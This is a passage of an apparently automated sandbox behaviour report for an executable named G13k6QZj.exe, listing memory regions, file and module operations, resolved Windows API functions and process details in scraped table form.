| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001f0000 | 0x002adfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002effff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x006effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000006f0000 | 0x006f0000 | 0x00877fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000880000 | 0x00880000 | 0x00a00fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x01e0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01f6ffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x75160000 | 0x7521dfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x753b0000 | 0x753f3fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x75430000 | 0x767eefff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x76810000 | 0x7681efff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x77340000 | 0x773ccfff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x773f0000 | 0x778ccfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x77c30000 | 0x77c3bfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007feb0000 | 0x7feb0000 | 0x7ffaffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd8000 | 0x7ffd8000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7ff8ee37ffff | Private Memory | r |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (8)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIIHMN~1\AppData\Local\Temp\G13k6QZj64.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 |
Module (165)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | KERNEL32.DLL | base_address = 0x75260000 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x76a10000 |
|
1 | |
| Load | COMDLG32.dll | base_address = 0x75160000 |
|
1 | |
| Load | GDI32.dll | base_address = 0x77000000 |
|
1 | |
| Load | USER32.dll | base_address = 0x77150000 |
|
1 | |
| Load | VERSION.dll | base_address = 0x748e0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe, file_name_orig = C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe, size = 260 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x752860c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x75286110 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeviceIoControl, address_out = 0x752787e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DuplicateHandle, address_out = 0x75285f30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FormatMessageW, address_out = 0x75284a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventW, address_out = 0x75285fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessW, address_out = 0x7527a510 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsW, address_out = 0x7527c8c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDriveTypeW, address_out = 0x75286300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemDirectoryW, address_out = 0x75279a90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x752861b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadErrorMode, address_out = 0x7527fae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapSize, address_out = 0x77cf4f40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringW, address_out = 0x75279a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStringTypeW, address_out = 0x752779b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateThread, address_out = 0x7527fcb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x752792b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x7527a300 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x75286180 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindResourceW, address_out = 0x75283a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SizeofResource, address_out = 0x75278cb0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x75285f20 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x75272af0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadResource, address_out = 0x752778f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x75272db0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcess, address_out = 0x75272da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LockResource, address_out = 0x75277a50 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCommandLineW, address_out = 0x7527a4b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleW, address_out = 0x75279660 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryW, address_out = 0x7527a0b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStdHandle, address_out = 0x7527a060 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x752787c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalAlloc, address_out = 0x75278840 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x75277940 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x75279560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleScreenBufferInfo, address_out = 0x752869c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileType, address_out = 0x75286390 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OutputDebugStringW, address_out = 0x752a1c30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleW, address_out = 0x752868e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteConsoleW, address_out = 0x75286920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointerEx, address_out = 0x75286540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnterCriticalSection, address_out = 0x77ce5e80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LeaveCriticalSection, address_out = 0x77ce5e00 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetStdHandle, address_out = 0x752a26a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x77cdda90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EncodePointer, address_out = 0x77cff190 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DecodePointer, address_out = 0x77cfa200 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x752874f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleExW, address_out = 0x75279fa0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MultiByteToWideChar, address_out = 0x75272d60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WideCharToMultiByte, address_out = 0x752775a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x752725e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleMode, address_out = 0x75286870 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadConsoleInputA, address_out = 0x752868c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleMode, address_out = 0x75286900 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x75279700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x75271b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x77d02570 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryExW, address_out = 0x75277920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteCriticalSection, address_out = 0x77cf9920 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x752862a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x75286590 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetConsoleCP, address_out = 0x75286860 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x75279680 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x752864a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetStartupInfoW, address_out = 0x7527a080 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = UnhandledExceptionFilter, address_out = 0x752a28e0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetUnhandledExceptionFilter, address_out = 0x7527a2c0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionAndSpinCount, address_out = 0x75286020 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x752777b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TerminateProcess, address_out = 0x7527fbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsAlloc, address_out = 0x75279a70 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsGetValue, address_out = 0x75271ba0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsSetValue, address_out = 0x75271da0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = TlsFree, address_out = 0x75279930 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidCodePage, address_out = 0x7527a090 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetACP, address_out = 0x75278770 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetOEMCP, address_out = 0x7527fd10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCPInfo, address_out = 0x75279fc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcessHeap, address_out = 0x75277910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = RtlUnwind, address_out = 0x75279a80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = QueryPerformanceCounter, address_out = 0x75272dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x75271d90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x75272b90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetEnvironmentStringsW, address_out = 0x7527a3b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeEnvironmentStringsW, address_out = 0x7527a0f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapReAlloc, address_out = 0x77cdbae0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x752864f0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x76a2ed40 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteKeyW, address_out = 0x76a2fca0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupPrivilegeValueW, address_out = 0x76a295e0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = AdjustTokenPrivileges, address_out = 0x76a30680 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x76a2ee90 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExW, address_out = 0x76a2f0a0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x76a2ed60 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExW, address_out = 0x76a2ed80 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x76a2f590 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyW, address_out = 0x76a306c0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x76a2efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = LookupAccountSidW, address_out = 0x76a2f7b0 |
|
1 | |
| Get Address | c:\windows\syswow64\comdlg32.dll | function = PrintDlgW, address_out = 0x7516c6a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartPage, address_out = 0x770aee10 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndDoc, address_out = 0x770855a0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = StartDocW, address_out = 0x770857e0 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = SetMapMode, address_out = 0x77089590 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = GetDeviceCaps, address_out = 0x77080820 |
|
1 | |
| Get Address | c:\windows\syswow64\gdi32.dll | function = EndPage, address_out = 0x770afbc0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SendMessageW, address_out = 0x771638f0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = DialogBoxIndirectParamW, address_out = 0x7717b6b0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = EndDialog, address_out = 0x7717b430 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = LoadCursorW, address_out = 0x77167740 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = InflateRect, address_out = 0x771774e0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetSysColorBrush, address_out = 0x7717efa0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetCursor, address_out = 0x77184ed0 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = SetWindowTextW, address_out = 0x77174580 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetDlgItem, address_out = 0x77171540 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoW, address_out = 0x748e1580 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = VerQueryValueW, address_out = 0x748e1500 |
|
1 | |
| Get Address | c:\windows\syswow64\version.dll | function = GetFileVersionInfoSizeW, address_out = 0x748e1560 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsAlloc, address_out = 0x7527a330 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsFree, address_out = 0x7527f400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsGetValue, address_out = 0x75277580 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlsSetValue, address_out = 0x75279910 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x75286030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventExW, address_out = 0x75285f90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x75285ff0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7527a5d0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7527a690 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x77cd40f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x77ccd630 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x77ccecf0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x75285720 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadpoolWait, address_out = 0x77cce140 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x77cceb60 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x77d09990 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x77d05540 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77cf9dc0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7527a550 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x752a0a40 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x74fa0790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7527f8a0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareStringEx, address_out = 0x7527fa30 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x752a1030 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7527a000 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x752a14b0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7527a4f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x752a16f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x75279970 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x74f23c90 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x75278710 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x752796e0 |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-11-09 19:48:34 (UTC) |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #217: backgroundtaskhost.exe
0
0
| Information | Value |
|---|---|
| ID | #217 |
| File Name | c:\windows\system32\backgroundtaskhost.exe |
| Command Line | "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppXy7vb4pc2dr3kc93kfc509b1d0arkfb2x.mca |
| Initial Working Directory | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\ |
| Monitor | Start Time: 00:03:23, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:18 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x440 |
| Parent PID | 0x248 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Low |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs | - |
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x0000008b6f530000 | 0x8b6f530000 | 0x8b6f54ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b6f550000 | 0x8b6f550000 | 0x8b6f563fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b6f570000 | 0x8b6f570000 | 0x8b6f5effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000008b6f5f0000 | 0x8b6f5f0000 | 0x8b6f5f3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000008b6f600000 | 0x8b6f600000 | 0x8b6f601fff | Private Memory | rw |
|
|
|
- |
| s-1-5-21-1462094071-1423818996-289466292-1000.pckgdep | 0x8b6f610000 | 0x8b6f610fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff470000 | 0x7df5ff470000 | 0x7ff5ff46ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x00007ff6559f0000 | 0x7ff6559f0000 | 0x7ff655a12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff655a14000 | 0x7ff655a14000 | 0x7ff655a14fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff655a1e000 | 0x7ff655a1e000 | 0x7ff655a1ffff | Private Memory | rw |
|
|
|
- |
| backgroundtaskhost.exe | 0x7ff6560e0000 | 0x7ff6560e6fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #219: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #219 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "publisherfunnydownloaded.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:24, Reason: Child Process |
| Unmonitor | End Time: 00:03:29, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xdd4 |
| Parent PID | 0xde8 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
E70
0x
D5C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
